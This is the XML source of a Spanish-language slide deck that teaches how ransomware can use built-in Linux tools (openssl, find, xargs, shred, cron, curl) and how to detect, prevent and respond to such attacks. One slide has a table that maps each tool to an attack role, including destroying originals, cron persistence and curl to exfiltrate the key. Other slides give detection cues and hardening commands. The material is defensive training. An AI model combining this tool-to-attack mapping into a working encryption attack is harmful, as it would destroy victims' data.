          <p:cNvPr id="3656240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/>
              <a:t>Si entendiste el ataque, entiendes dónde poner los controles.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Cada fase del ataque tiene un control defensivo correspondiente.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3339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El escenario</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1816056122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/>
              <a:t>"Comer tierra" es lo que sientes cuando descubres que un atacante cifró tus servidores sin instalar nada.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Sin malware en disco</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Sin firma que detectar</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Sin alerta del antivirus</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>¿Cómo es eso posible?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337176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Detección: auditd</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="937729323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838199" y="1825624"/>
            <a:ext cx="10515600" cy="37845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Instalar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apt install auditd</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
              <a:defRPr/>
            </a:pP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Vigilar llamadas masivas a openssl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auditctl -w /usr/bin/openssl -p x -k crypto_exec</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
              <a:defRPr/>
            </a:pP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Vigilar modificaciones a crontab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auditctl -w /var/spool/cron -p wa -k crontab_mod</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
              <a:defRPr/>
            </a:pP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Ver alertas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ausearch -k crypto_exec | tail -20</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Un spike de 500 procesos openssl en 10 segundos es una alerta real.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63573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Detección: comportamiento, no firma</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82581174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/>
              <a:t>Lo que hay que buscar:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>openssl lanzado por un proceso no esperado</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>xargs con -P alto y muchos forks en poco tiempo</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>shred ejecutado sobre extensiones de documento</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Escritura masiva de archivos .enc en directorios de usuario</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Modificación de crontab fuera de ventanas de mantenimiento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205701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Prevención: backups inmutables</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117019548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restic con repositorio de solo-escritura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restic -r s3:s3.amazonaws.com/mi-bucket backup /home</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
              <a:defRPr/>
            </a:pP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ZFS snapshot automático cada hora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zfs snapshot tank/home@$(date +%Y%m%d-%H%M)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
              <a:defRPr/>
            </a:pP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S3 Object Lock - no se puede borrar aunque te roben las credenciales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aws s3api put-object-retention ...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/>
              <a:t>El ransomware cifra lo que puede escribir. No puede borrar un snapshot ZFS ni un Object Lock.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859484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Prevención: mínimo privilegio</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61831560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Archivos críticos inmutables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chattr +i /etc/passwd /etc/shadow /etc/crontab</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
              <a:defRPr/>
            </a:pP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AppArmor: openssl solo puede leer /tmp y /home/app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/etc/apparmor.d/usr.bin.openssl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/usr/bin/openssl {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/tmp/** rw,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/home/app/** rw,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deny /** w,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}</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Un proceso que no puede escribir fuera de su directorio no puede cifrar el sistema.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959539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Respuesta: el runbook</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1686966563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 lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Aislar - desconectar de red, no apagar (la clave puede estar en RAM)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Preservar - dump de memoria con avml antes de cualquier acción</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Identificar - ¿la clave fue exfiltrada? revisar logs de red</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Contener - revocar credenciales, limpiar crontabs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Recuperar - restaurar desde snapshot inmutable más reciente</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Post-mortem - ¿qué control hubiera parado esto?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353704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Módulo 6</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1769422910" name="Text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 b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cierre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043843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Lo que aprendiste hoy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="644930507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 lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Los LOLBins convierten el sistema en su propio enemigo</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>xargs -P es la diferencia entre minutos y segundos</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>El cifrado AES-256 con openssl es trivial desde la CLI</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>La defensa efectiva requiere entender el ataque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475369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La lección real</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75856138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/>
              <a:t>La mejor defensa es saber exactamente cómo te van a atacar.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Un blue teamer que nunca ha ejecutado un ataque no sabe qué está buscando.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703829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Recursos</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1678612948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 lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>GTFOBins - catálogo de LOLBins y sus usos ofensivos</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>LOLBAS - equivalente para Windows</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>MITRE ATT&amp;CK T1486 - Data Encrypted for Impact</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>auditd rules - github.com/Neo23x0/auditd</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Tarea: auditar tu propio entorno con auditd. ¿Qué encontraste?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3303988" name="Text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"Que coman tierra... pero los atacantes."</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Preguntas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304208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Módulo 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335162430" name="Text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 b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>El problema invisible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36053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Compilar con pandoc</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="779699811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PPTX con plantilla corporativa (recomendado)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pandoc slides.md -t pptx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--reference-doc="../../Red Team.pptx"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-o slides.pptx</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
              <a:defRPr/>
            </a:pP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# reveal.js (para presentar en browser)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pandoc slides.md -t revealjs -s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--highlight-style=monokai \</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>-o slides.html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0171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¿Qué son los LOLBins?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1528890280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/>
              <a:t>Living Off the Land Binaries</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Herramientas legítimas del sistema operativo usadas con fines maliciosos.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Ya están instaladas</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Son de confianza para el OS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Los antivirus no las bloquean</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Los logs las registran como actividad "normal"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485885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¿Por qué los antivirus no los detienen?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="526276039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/>
              <a:t>Los AV buscan firmas — patrones de código malicioso conocido.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>openssl, find, xargs, shred... son binarios firmados, legítimos, cotidianos.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>No hay nada que detectar.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30045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Casos reales</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228574554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 lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>NotPetya (2017): usó wmic y psexec para propagación lateral</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Living off the Land attacks: el 62% de los ataques modernos usan LOLBins (CrowdStrike, 2023)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Ransomware-as-a-Service: los kits más sofisticados evitan dropper ejecutables</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>La pregunta incómoda: ¿qué tan fácil es replicarlo?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753633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Módulo 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196143788" name="Text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 b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>El arsenal del sistema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664898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Lo que ya tienes instalado</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="652795814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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Ninguno de estos necesita instalación.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="603898965" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838199" y="2615549"/>
          <a:ext cx="10528299" cy="24876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628900"/>
                <a:gridCol w="7886700"/>
              </a:tblGrid>
              <a:tr h="353571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Herramienta</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="8B0000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Para qué lo usa un atacante</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="8B0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="353571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openssl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Cifrado AES-256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53571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find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Mapear archivos objetivo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353571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xargs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Paralelizar el ataque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53571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shred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Destruir los originales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353571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cron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Persistencia</a:t>
                      </a:r>
                      <a:endParaRPr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53574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curl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rgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exfiltrar la clave</a:t>
                      </a:r>
                      <a:endParaRPr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customXml/_rels/item1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97c87f1-bf2b-4103-84c0-26f1c6fed8b2" xsi:nil="true"/>
    <lcf76f155ced4ddcb4097134ff3c332f xmlns="997c87f1-bf2b-4103-84c0-26f1c6fed8b2">
      <Terms xmlns="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    </lcf76f155ced4ddcb4097134ff3c332f>
    <TaxCatchAll xmlns="cfdf8a9b-f9c9-464f-a560-5d0dfeaf37b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6804638235E04A8340AFEA8AA3D0E9" ma:contentTypeVersion="16" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="431fd91d37a779fe06bfe764accb67a5">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="997c87f1-bf2b-4103-84c0-26f1c6fed8b2" xmlns:ns3="cfdf8a9b-f9c9-464f-a560-5d0dfeaf37be" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="8593362854081fba2f404972ddc45d7c" ns2:_="" ns3:_="">
    <xsd:import namespace="997c87f1-bf2b-4103-84c0-26f1c6fed8b2"/>
    <xsd:import namespace="cfdf8a9b-f9c9-464f-a560-5d0dfeaf37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_Flow_SignoffStatu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c87f1-bf2b-4103-84c0-26f1c6fed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dfa4cb6-0ef6-46f9-a59d-2ff317cce1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f8a9b-f9c9-464f-a560-5d0dfeaf37b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2361b79-10be-423a-9b5b-ca67978814fb}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="cfdf8a9b-f9c9-464f-a560-5d0dfeaf37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6DAD30-71C1-4A54-8A40-378DBB1DF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8028F9-AA23-4355-8BF6-CA440F3C7E08}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="997c87f1-bf2b-4103-84c0-26f1c6fed8b2"/>
    <ds:schemaRef ds:uri="cfdf8a9b-f9c9-464f-a560-5d0dfeaf37be"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{F04A6F5B-CBA5-4A38-BF3D-E965E1D4C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7c87f1-bf2b-4103-84c0-26f1c6fed8b2"/>
    <ds:schemaRef ds:uri="cfdf8a9b-f9c9-464f-a560-5d0dfeaf37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ONLYOFFICE/9.0.3.29</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>0</Paragraphs>
  <Slides>40</Slides>
  <Notes>40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Anahí Cespedes</dc:creator>
  <cp:lastModifiedBy/>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-26T20:11:05Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-28T23:05:18Z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0x010100D16804638235E04A8340AFEA8AA3D0E9</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MediaServiceImageTags">
    <vt:lpwstr/>
  </property>
</Properties>
</file>